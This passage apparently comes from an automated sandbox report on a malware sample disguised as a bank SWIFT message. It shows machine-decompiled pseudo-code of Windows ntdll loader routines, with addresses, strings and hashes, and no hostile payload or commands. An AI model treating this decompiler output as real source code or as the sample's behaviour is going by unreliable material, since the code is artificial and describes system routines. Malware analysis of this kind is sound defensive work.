                                                                    							_t244 = _v48;
                                                                    							do {
                                                                    								 *_t281 = 0;
                                                                    								_t282 = _t281 + 2;
                                                                    								E018DBB40(_t262,  &_v68, _t244);
                                                                    								if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    									_t279 =  &(_t279[0]);
                                                                    								}
                                                                    								_t244 = _t282;
                                                                    								_t281 = E018E1370(_t282, 0x1874e90);
                                                                    								_pop(_t262);
                                                                    							} while (_t281 != 0);
                                                                    							_v48 = _t244;
                                                                    							_t242 = _v52;
                                                                    						}
                                                                    						_t201 = _v48;
                                                                    						_t280 = 0;
                                                                    						if( *_v48 != 0) {
                                                                    							E018DBB40(_t262,  &_v68, _t201);
                                                                    							if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    								_t279 =  &(_t279[0]);
                                                                    							}
                                                                    						}
                                                                    						if(_t279 == 0) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                    							_v28 = _t280;
                                                                    							_v16 = _t280;
                                                                    						}
                                                                    						_t202 = _v8;
                                                                    						if(_v8 != 0) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                    						}
                                                                    						_v8 = _t280;
                                                                    						goto L28;
                                                                    					}
                                                                    				}
                                                                    				_t214 = _v12;
                                                                    				_t264 = _v12 + 4;
                                                                    				_v40 = _t264;
                                                                    				if(_t264 == 0) {
                                                                    					_v20 = _t280;
                                                                    				} else {
                                                                    					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                    					_t280 = _t236;
                                                                    					_v20 = _t236;
                                                                    					_t214 = _v12;
                                                                    				}
                                                                    				if(_t280 == 0) {
                                                                    					_t161 = 0;
                                                                    					_t280 = 0xc0000017;
                                                                    					_v40 = 0;
                                                                    					goto L48;
                                                                    				} else {
                                                                    					E018DF3E0(_t280, _v8, _t214);
                                                                    					_t285 = _t285 + 0xc;
                                                                    					_v48 = _t280;
                                                                    					_t283 = E018E1370(_t280, 0x1874e90);
                                                                    					_pop(_t267);
                                                                    					if(_t283 != 0) {
                                                                    						_t245 = _v48;
                                                                    						do {
                                                                    							 *_t283 = 0;
                                                                    							_t284 = _t283 + 2;
                                                                    							E018DBB40(_t267,  &_v68, _t245);
                                                                    							if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    								_t275 = _t275 + 1;
                                                                    							}
                                                                    							_t245 = _t284;
                                                                    							_t283 = E018E1370(_t284, 0x1874e90);
                                                                    							_pop(_t267);
                                                                    						} while (_t283 != 0);
                                                                    						_v48 = _t245;
                                                                    						_t242 = _v52;
                                                                    					}
                                                                    					_t224 = _v48;
                                                                    					_t280 = 0;
                                                                    					if( *_v48 != 0) {
                                                                    						E018DBB40(_t267,  &_v68, _t224);
                                                                    						if(L018A43C0( &_v68,  &_v24) != 0) {
                                                                    							_t275 = _t275 + 1;
                                                                    						}
                                                                    					}
                                                                    					if(_t275 == 0) {
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                    						_v40 = _t280;
                                                                    						_v20 = _t280;
                                                                    					}
                                                                    					_t225 = _v8;
                                                                    					if(_v8 != 0) {
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                    					}
                                                                    					_v8 = _t280;
                                                                    					goto L16;
                                                                    				}
                                                                    			}










































                                                                    0x018a3d3c
                                                                    0x018a3d42
                                                                    0x018a3d44
                                                                    0x018a3d46
                                                                    0x018a3d49
                                                                    0x018a3d4c
                                                                    0x018a3d4f
                                                                    0x018a3d52
                                                                    0x018a3d55
                                                                    0x018a3d58
                                                                    0x018a3d5b
                                                                    0x018a3d5f
                                                                    0x018a3d61
                                                                    0x018a3d66
                                                                    0x018f8213
                                                                    0x018f8218
                                                                    0x018a4085
                                                                    0x018a4088
                                                                    0x018a408e
                                                                    0x018a4094
                                                                    0x018a409a
                                                                    0x018a40a0
                                                                    0x018a40a6
                                                                    0x018a40a9
                                                                    0x018a40af
                                                                    0x018a40b6
                                                                    0x018a40bd
                                                                    0x018a40bd
                                                                    0x018a3d83
                                                                    0x018f821f
                                                                    0x018f8229
                                                                    0x018f8238
                                                                    0x018f8238
                                                                    0x018f823d
                                                                    0x018f823d
                                                                    0x018a3da0
                                                                    0x018a3daf
                                                                    0x018a3db5
                                                                    0x018a3dba
                                                                    0x018a3dba
                                                                    0x018a3dd4
                                                                    0x018a3e94
                                                                    0x018a3eab
                                                                    0x018a3f6d
                                                                    0x018a3f84
                                                                    0x018a406b
                                                                    0x018a406b
                                                                    0x018a406e
                                                                    0x018a406e
                                                                    0x018a4070
                                                                    0x018a4074
                                                                    0x018f8351
                                                                    0x018f8351
                                                                    0x018a407a
                                                                    0x018a407f
                                                                    0x018f835d
                                                                    0x018f8370
                                                                    0x018f8377
                                                                    0x018f8379
                                                                    0x018f837c
                                                                    0x018f837c
                                                                    0x018f835d
                                                                    0x00000000
                                                                    0x018a407f
                                                                    0x018a3f8a
                                                                    0x018a3f8d
                                                                    0x018a3f90
                                                                    0x018a3f95
                                                                    0x018f830d
                                                                    0x018f830f
                                                                    0x018a3f9b
                                                                    0x018a3fac
                                                                    0x018a3fae
                                                                    0x018a3fb1
                                                                    0x018a3fb1
                                                                    0x018a3fb6
                                                                    0x018f8317
                                                                    0x018f831a
                                                                    0x00000000
                                                                    0x018a3fbc
                                                                    0x018a3fc1
                                                                    0x018a3fc9
                                                                    0x018a3fd7
                                                                    0x018a3fda
                                                                    0x018a3fdd
                                                                    0x018a4021
                                                                    0x018a4021
                                                                    0x018a4029
                                                                    0x018a4030
                                                                    0x018a4044
                                                                    0x018a4046
                                                                    0x018a4046
                                                                    0x018a4044
                                                                    0x018a4049
                                                                    0x018f8327
                                                                    0x018f8334
                                                                    0x018f8339
                                                                    0x018f833c
                                                                    0x018a404f
                                                                    0x018a404f
                                                                    0x018a404f
                                                                    0x018a4051
                                                                    0x018a4056
                                                                    0x018a4063
                                                                    0x018a4063
                                                                    0x018a4068
                                                                    0x00000000
                                                                    0x018a4068
                                                                    0x018a3fdf
                                                                    0x018a3fe2
                                                                    0x018a3fe4
                                                                    0x018a3fe7
                                                                    0x018a3fef
                                                                    0x018a4003
                                                                    0x018a4005
                                                                    0x018a4005
                                                                    0x018a400c
                                                                    0x018a4013
                                                                    0x018a4016
                                                                    0x018a4017
                                                                    0x018a401b
                                                                    0x018a401e
                                                                    0x00000000
                                                                    0x018a401e
                                                                    0x018a3fb6
                                                                    0x018a3eb1
                                                                    0x018a3eb4
                                                                    0x018a3eb7
                                                                    0x018a3ebc
                                                                    0x018f82a9
                                                                    0x018f82ab
                                                                    0x018a3ec2
                                                                    0x018a3ed3
                                                                    0x018a3ed5
                                                                    0x018a3ed8
                                                                    0x018a3ed8
                                                                    0x018a3edd
                                                                    0x018f82b3
                                                                    0x018f82b6
                                                                    0x00000000
                                                                    0x018a3ee3
                                                                    0x018a3ee8
                                                                    0x018a3eed
                                                                    0x018a3ef0
                                                                    0x018a3ef3
                                                                    0x018a3f02
                                                                    0x018a3f05
                                                                    0x018a3f08
                                                                    0x018f82c0
                                                                    0x018f82c3
                                                                    0x018f82c5
                                                                    0x018f82c8
                                                                    0x018f82d0
                                                                    0x018f82e4
                                                                    0x018f82e6
                                                                    0x018f82e6
                                                                    0x018f82ed
                                                                    0x018f82f4
                                                                    0x018f82f7
                                                                    0x018f82f8
                                                                    0x018f82fc
                                                                    0x018f82ff
                                                                    0x018f82ff
                                                                    0x018a3f0e
                                                                    0x018a3f11
                                                                    0x018a3f16
                                                                    0x018a3f1d
                                                                    0x018a3f31
                                                                    0x018f8307
                                                                    0x018f8307
                                                                    0x018a3f31
                                                                    0x018a3f39
                                                                    0x018a3f48
                                                                    0x018a3f4d
                                                                    0x018a3f50
                                                                    0x018a3f50
                                                                    0x018a3f53
                                                                    0x018a3f58
                                                                    0x018a3f65
                                                                    0x018a3f65
                                                                    0x018a3f6a
                                                                    0x00000000
                                                                    0x018a3f6a
                                                                    0x018a3edd
                                                                    0x018a3dda
                                                                    0x018a3ddd
                                                                    0x018a3de0
                                                                    0x018a3de5
                                                                    0x018f8245
                                                                    0x018a3deb
                                                                    0x018a3df7
                                                                    0x018a3dfc
                                                                    0x018a3dfe
                                                                    0x018a3e01
                                                                    0x018a3e01
                                                                    0x018a3e06
                                                                    0x018f824d
                                                                    0x018f824f
                                                                    0x018f8254
                                                                    0x00000000
                                                                    0x018a3e0c
                                                                    0x018a3e11
                                                                    0x018a3e16
                                                                    0x018a3e19
                                                                    0x018a3e29
                                                                    0x018a3e2c
                                                                    0x018a3e2f
                                                                    0x018f825c
                                                                    0x018f825f
                                                                    0x018f8261
                                                                    0x018f8264
                                                                    0x018f826c
                                                                    0x018f8280
                                                                    0x018f8282
                                                                    0x018f8282
                                                                    0x018f8289
                                                                    0x018f8290
                                                                    0x018f8293
                                                                    0x018f8294
                                                                    0x018f8298
                                                                    0x018f829b
                                                                    0x018f829b
                                                                    0x018a3e35
                                                                    0x018a3e38
                                                                    0x018a3e3d
                                                                    0x018a3e44
                                                                    0x018a3e58
                                                                    0x018f82a3
                                                                    0x018f82a3
                                                                    0x018a3e58
                                                                    0x018a3e60
                                                                    0x018a3e6f
                                                                    0x018a3e74
                                                                    0x018a3e77
                                                                    0x018a3e77
                                                                    0x018a3e7a
                                                                    0x018a3e7f
                                                                    0x018a3e8c
                                                                    0x018a3e8c
                                                                    0x018a3e91
                                                                    0x00000000
                                                                    0x018a3e91

                                                                    Strings
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
                                                                    • WindowsExcludedProcs, xrefs: 018A3D6F
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 018A3D8C
                                                                    • Kernel-MUI-Language-SKU, xrefs: 018A3F70
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                                                    • Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
                                                                    • Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                                                    • Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E018A8794(void* __ecx) {
                                                                    				signed int _v0;
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				void* _v16;
                                                                    				signed int _v20;
                                                                    				intOrPtr _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				signed int _v40;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr* _t77;
                                                                    				signed int _t80;
                                                                    				signed char _t81;
                                                                    				signed int _t87;
                                                                    				signed int _t91;
                                                                    				void* _t92;
                                                                    				void* _t94;
                                                                    				signed int _t95;
                                                                    				signed int _t103;
                                                                    				signed int _t105;
                                                                    				signed int _t110;
                                                                    				signed int _t118;
                                                                    				intOrPtr* _t121;
                                                                    				intOrPtr _t122;
                                                                    				signed int _t125;
                                                                    				signed int _t129;
                                                                    				signed int _t131;
                                                                    				signed int _t134;
                                                                    				signed int _t136;
                                                                    				signed int _t143;
                                                                    				signed int* _t147;
                                                                    				signed int _t151;
                                                                    				void* _t153;
                                                                    				signed int* _t157;
                                                                    				signed int _t159;
                                                                    				signed int _t161;
                                                                    				signed int _t166;
                                                                    				signed int _t168;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t153 = __ecx;
                                                                    				_t159 = 0;
                                                                    				_t121 = __ecx + 0x3c;
                                                                    				if( *_t121 == 0) {
                                                                    					L2:
                                                                    					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                    					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                    						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                    						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                    						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                    							L6:
                                                                    							if(E018A934A() != 0) {
                                                                    								_t159 = E0191A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                    								__eflags = _t159;
                                                                    								if(_t159 < 0) {
                                                                    									_t81 =  *0x1985780; // 0x0
                                                                    									__eflags = _t81 & 0x00000003;
                                                                    									if((_t81 & 0x00000003) != 0) {
                                                                    										_push(_t159);
                                                                    										E01915510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                    										_t81 =  *0x1985780; // 0x0
                                                                    									}
                                                                    									__eflags = _t81 & 0x00000010;
                                                                    									if((_t81 & 0x00000010) != 0) {
                                                                    										asm("int3");
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							_t159 = E018A849B(0, _t122, _t153, _t159, _t180);
                                                                    							if(_t159 >= 0) {
                                                                    								goto L6;
                                                                    							}
                                                                    						}
                                                                    						_t80 = _t159;
                                                                    						goto L8;
                                                                    					} else {
                                                                    						_t125 = 0x13;
                                                                    						asm("int 0x29");
                                                                    						_push(0);
                                                                    						_push(_t159);
                                                                    						_t161 = _t125;
                                                                    						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                    						_t143 = 0;
                                                                    						_v40 = _t161;
                                                                    						_t118 = 0;
                                                                    						_push(_t153);
                                                                    						__eflags = _t87;
                                                                    						if(_t87 != 0) {
                                                                    							_t118 = _t87 + 0x5d8;
                                                                    							__eflags = _t118;
                                                                    							if(_t118 == 0) {
                                                                    								L46:
                                                                    								_t118 = 0;
                                                                    							} else {
                                                                    								__eflags =  *(_t118 + 0x30);
                                                                    								if( *(_t118 + 0x30) == 0) {
                                                                    									goto L46;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_v32 = 0;
                                                                    						_v28 = 0;
                                                                    						_v16 = 0;
                                                                    						_v20 = 0;
                                                                    						_v12 = 0;
                                                                    						__eflags = _t118;
                                                                    						if(_t118 != 0) {
                                                                    							__eflags = _t161;
                                                                    							if(_t161 != 0) {
                                                                    								__eflags =  *(_t118 + 8);
                                                                    								if( *(_t118 + 8) == 0) {
                                                                    									L22:
                                                                    									_t143 = 1;
                                                                    									__eflags = 1;
                                                                    								} else {
                                                                    									_t19 = _t118 + 0x40; // 0x40
                                                                    									_t156 = _t19;
                                                                    									E018A8999(_t19,  &_v16);
                                                                    									__eflags = _v0;
                                                                    									if(_v0 != 0) {
                                                                    										__eflags = _v0 - 1;
                                                                    										if(_v0 != 1) {
                                                                    											goto L22;
                                                                    										} else {
                                                                    											_t128 =  *(_t161 + 0x64);
                                                                    											__eflags =  *(_t161 + 0x64);
                                                                    											if( *(_t161 + 0x64) == 0) {
                                                                    												goto L22;
                                                                    											} else {
                                                                    												E018A8999(_t128,  &_v12);
                                                                    												_t147 = _v12;
                                                                    												_t91 = 0;
                                                                    												__eflags = 0;
                                                                    												_t129 =  *_t147;
                                                                    												while(1) {
                                                                    													__eflags =  *((intOrPtr*)(0x1985c60 + _t91 * 8)) - _t129;
                                                                    													if( *((intOrPtr*)(0x1985c60 + _t91 * 8)) == _t129) {
                                                                    														break;
                                                                    													}
                                                                    													_t91 = _t91 + 1;
                                                                    													__eflags = _t91 - 5;
                                                                    													if(_t91 < 5) {
                                                                    														continue;
                                                                    													} else {
                                                                    														_t131 = 0;
                                                                    														__eflags = 0;
                                                                    													}
                                                                    													L37:
                                                                    													__eflags = _t131;
                                                                    													if(_t131 != 0) {
                                                                    														goto L22;
                                                                    													} else {
                                                                    														__eflags = _v16 - _t147;
                                                                    														if(_v16 != _t147) {
                                                                    															goto L22;
                                                                    														} else {
                                                                    															E018B2280(_t92, 0x19886cc);
                                                                    															_t94 = E01969DFB( &_v20);
                                                                    															__eflags = _t94 - 1;
                                                                    															if(_t94 != 1) {
                                                                    															}
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															 *_t118 =  *_t118 + 1;
                                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                                    															_t95 = E018C61A0( &_v32);
                                                                    															__eflags = _t95;
                                                                    															if(_t95 != 0) {
                                                                    																__eflags = _v32 | _v28;
                                                                    																if((_v32 | _v28) != 0) {
                                                                    																	_t71 = _t118 + 0x40; // 0x3f
                                                                    																	_t134 = _t71;
                                                                    																	goto L55;
                                                                    																}
                                                                    															}
                                                                    															goto L30;
                                                                    														}
                                                                    													}
                                                                    													goto L56;
                                                                    												}
                                                                    												_t92 = 0x1985c64 + _t91 * 8;
                                                                    												asm("lock xadd [eax], ecx");
                                                                    												_t131 = (_t129 | 0xffffffff) - 1;
                                                                    												goto L37;
                                                                    											}
                                                                    										}
                                                                    										goto L56;
                                                                    									} else {
                                                                    										_t143 = E018A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                    										__eflags = _t143;
                                                                    										if(_t143 != 0) {
                                                                    											_t157 = _v12;
                                                                    											_t103 = 0;
                                                                    											__eflags = 0;
                                                                    											_t136 =  &(_t157[1]);
                                                                    											 *(_t161 + 0x64) = _t136;
                                                                    											_t151 =  *_t157;
                                                                    											_v20 = _t136;
                                                                    											while(1) {
                                                                    												__eflags =  *((intOrPtr*)(0x1985c60 + _t103 * 8)) - _t151;
                                                                    												if( *((intOrPtr*)(0x1985c60 + _t103 * 8)) == _t151) {
                                                                    													break;
                                                                    												}
                                                                    												_t103 = _t103 + 1;
                                                                    												__eflags = _t103 - 5;
                                                                    												if(_t103 < 5) {
                                                                    													continue;
                                                                    												}
                                                                    												L21:
                                                                    												_t105 = E018DF380(_t136, 0x1871184, 0x10);
                                                                    												__eflags = _t105;
                                                                    												if(_t105 != 0) {
                                                                    													__eflags =  *_t157 -  *_v16;
                                                                    													if( *_t157 >=  *_v16) {
                                                                    														goto L22;
                                                                    													} else {
                                                                    														asm("cdq");
                                                                    														_t166 = _t157[5] & 0x0000ffff;
                                                                    														_t108 = _t157[5] & 0x0000ffff;
                                                                    														asm("cdq");
                                                                    														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                    														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                    														if(__eflags > 0) {
                                                                    															L29:
                                                                    															E018B2280(_t108, 0x19886cc);
                                                                    															 *_t118 =  *_t118 + 1;
                                                                    															_t42 = _t118 + 0x40; // 0x3f
                                                                    															_t156 = _t42;
                                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															asm("movsd");
                                                                    															_t110 = E018C61A0( &_v32);
                                                                    															__eflags = _t110;
                                                                    															if(_t110 != 0) {
                                                                    																__eflags = _v32 | _v28;
                                                                    																if((_v32 | _v28) != 0) {
                                                                    																	_t134 = _v20;
                                                                    																	L55:
                                                                    																	E01969D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                    																}
                                                                    															}
                                                                    															L30:
                                                                    															 *_t118 =  *_t118 + 1;
                                                                    															asm("adc dword [ebx+0x4], 0x0");
                                                                    															E018AFFB0(_t118, _t156, 0x19886cc);
                                                                    															goto L22;
                                                                    														} else {
                                                                    															if(__eflags < 0) {
                                                                    																goto L22;
                                                                    															} else {
                                                                    																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                    																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                    																	goto L22;
                                                                    																} else {
                                                                    																	goto L29;
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													goto L56;
                                                                    												}
                                                                    												goto L22;
                                                                    											}
                                                                    											asm("lock inc dword [eax]");
                                                                    											goto L21;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						return _t143;
                                                                    					}
                                                                    				} else {
                                                                    					_push( &_v8);
                                                                    					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                    					_push(__ecx + 0x40);
                                                                    					_push(_t121);
                                                                    					_push(0xffffffff);
                                                                    					_t80 = E018D9A00();
                                                                    					_t159 = _t80;
                                                                    					if(_t159 < 0) {
                                                                    						L8:
                                                                    						return _t80;
                                                                    					} else {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				L56:
                                                                    			}












































                                                                    0x018a8799
                                                                    0x018a879d
                                                                    0x018a87a1
                                                                    0x018a87a3
                                                                    0x018a87a8
                                                                    0x018a87c3
                                                                    0x018a87c3
                                                                    0x018a87c8
                                                                    0x018a87d1
                                                                    0x018a87d4
                                                                    0x018a87d8
                                                                    0x018a87e5
                                                                    0x018a87ec
                                                                    0x018f9bfe
                                                                    0x018f9c00
                                                                    0x018f9c02
                                                                    0x018f9c08
                                                                    0x018f9c0d
                                                                    0x018f9c0f
                                                                    0x018f9c14
                                                                    0x018f9c2d
                                                                    0x018f9c32
                                                                    0x018f9c37
                                                                    0x018f9c3a
                                                                    0x018f9c3c
                                                                    0x018f9c42
                                                                    0x018f9c42
                                                                    0x018f9c3c
                                                                    0x018f9c02
                                                                    0x018a87da
                                                                    0x018a87df
                                                                    0x018a87e3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a87e3
                                                                    0x018a87f2
                                                                    0x00000000
                                                                    0x018a87fb
                                                                    0x018a87fd
                                                                    0x018a87fe
                                                                    0x018a880e
                                                                    0x018a880f
                                                                    0x018a8810
                                                                    0x018a8814
                                                                    0x018a881a
                                                                    0x018a881c
                                                                    0x018a881f
                                                                    0x018a8821
                                                                    0x018a8822
                                                                    0x018a8824
                                                                    0x018a8826
                                                                    0x018a882c
                                                                    0x018a882e
                                                                    0x018f9c48
                                                                    0x018f9c48
                                                                    0x018a8834
                                                                    0x018a8834
                                                                    0x018a8837
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a8837
                                                                    0x018a882e
                                                                    0x018a883d
                                                                    0x018a8840
                                                                    0x018a8843
                                                                    0x018a8846
                                                                    0x018a8849
                                                                    0x018a884c
                                                                    0x018a884e
                                                                    0x018a8850
                                                                    0x018a8852
                                                                    0x018a8854
                                                                    0x018a8857
                                                                    0x018a88b4
                                                                    0x018a88b6
                                                                    0x018a88b6
                                                                    0x018a8859
                                                                    0x018a8859
                                                                    0x018a8859
                                                                    0x018a8861
                                                                    0x018a8866
                                                                    0x018a886a
                                                                    0x018a893d
                                                                    0x018a8941
                                                                    0x00000000
                                                                    0x018a8947
                                                                    0x018a8947
                                                                    0x018a894a
                                                                    0x018a894c
                                                                    0x00000000
                                                                    0x018a8952
                                                                    0x018a8955
                                                                    0x018a895a
                                                                    0x018a895d
                                                                    0x018a895d
                                                                    0x018a895f
                                                                    0x018a8961
                                                                    0x018a8961
                                                                    0x018a8968
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a896a
                                                                    0x018a896b
                                                                    0x018a896e
                                                                    0x00000000
                                                                    0x018a8970
                                                                    0x018a8970
                                                                    0x018a8970
                                                                    0x018a8970
                                                                    0x018a8972
                                                                    0x018a8972
                                                                    0x018a8974
                                                                    0x00000000
                                                                    0x018a897a
                                                                    0x018a897a
                                                                    0x018a897d
                                                                    0x00000000
                                                                    0x018a8983
                                                                    0x018f9c65
                                                                    0x018f9c6d
                                                                    0x018f9c72
                                                                    0x018f9c75
                                                                    0x018f9c75
                                                                    0x018f9c82
                                                                    0x018f9c86
                                                                    0x018f9c87
                                                                    0x018f9c88
                                                                    0x018f9c89
                                                                    0x018f9c8c
                                                                    0x018f9c90
                                                                    0x018f9c95
                                                                    0x018f9c97
                                                                    0x018f9ca0
                                                                    0x018f9ca3
                                                                    0x018f9ca9
                                                                    0x018f9ca9
                                                                    0x00000000
                                                                    0x018f9ca9
                                                                    0x018f9ca3
                                                                    0x00000000
                                                                    0x018f9c97
                                                                    0x018a897d
                                                                    0x00000000
                                                                    0x018a8974
                                                                    0x018a8988
                                                                    0x018a8992
                                                                    0x018a8996
                                                                    0x00000000
                                                                    0x018a8996
                                                                    0x018a894c
                                                                    0x00000000
                                                                    0x018a8870
                                                                    0x018a887b
                                                                    0x018a887d
                                                                    0x018a887f
                                                                    0x018a8881
                                                                    0x018a8884
                                                                    0x018a8884
                                                                    0x018a8886
                                                                    0x018a8889
                                                                    0x018a888c
                                                                    0x018a888e
                                                                    0x018a8891
                                                                    0x018a8891
                                                                    0x018a8898
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a889a
                                                                    0x018a889b
                                                                    0x018a889e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a88a0
                                                                    0x018a88a8
                                                                    0x018a88b0
                                                                    0x018a88b2
                                                                    0x018a88d3
                                                                    0x018a88d5
                                                                    0x00000000
                                                                    0x018a88d7
                                                                    0x018a88db
                                                                    0x018a88dc
                                                                    0x018a88e0
                                                                    0x018a88e8
                                                                    0x018a88ee
                                                                    0x018a88f0
                                                                    0x018a88f3
                                                                    0x018a88fc
                                                                    0x018a8901
                                                                    0x018a8906
                                                                    0x018a890c
                                                                    0x018a890c
                                                                    0x018a890f
                                                                    0x018a8916
                                                                    0x018a8917
                                                                    0x018a8918
                                                                    0x018a8919
                                                                    0x018a891a
                                                                    0x018a891f
                                                                    0x018a8921
                                                                    0x018f9c52
                                                                    0x018f9c55
                                                                    0x018f9c5b
                                                                    0x018f9cac
                                                                    0x018f9cc0
                                                                    0x018f9cc0
                                                                    0x018f9c55
                                                                    0x018a8927
                                                                    0x018a8927
                                                                    0x018a892f
                                                                    0x018a8933
                                                                    0x00000000
                                                                    0x018a88f5
                                                                    0x018a88f5
                                                                    0x00000000
                                                                    0x018a88f7
                                                                    0x018a88f7
                                                                    0x018a88fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a88fa
                                                                    0x018a88f5
                                                                    0x018a88f3
                                                                    0x00000000
                                                                    0x018a88d5
                                                                    0x00000000
                                                                    0x018a88b2
                                                                    0x018a88c9
                                                                    0x00000000
                                                                    0x018a88c9
                                                                    0x018a887f
                                                                    0x018a886a
                                                                    0x018a8857
                                                                    0x018a8852
                                                                    0x018a88bf
                                                                    0x018a88bf
                                                                    0x018a87aa
                                                                    0x018a87ad
                                                                    0x018a87ae
                                                                    0x018a87b4
                                                                    0x018a87b5
                                                                    0x018a87b6
                                                                    0x018a87b8
                                                                    0x018a87bd
                                                                    0x018a87c1
                                                                    0x018a87f4
                                                                    0x018a87fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a87c1
                                                                    0x00000000

                                                                    Strings
                                                                    • LdrpDoPostSnapWork, xrefs: 018F9C1E
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                                                    • Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
                                                                    • Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                                                    • Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

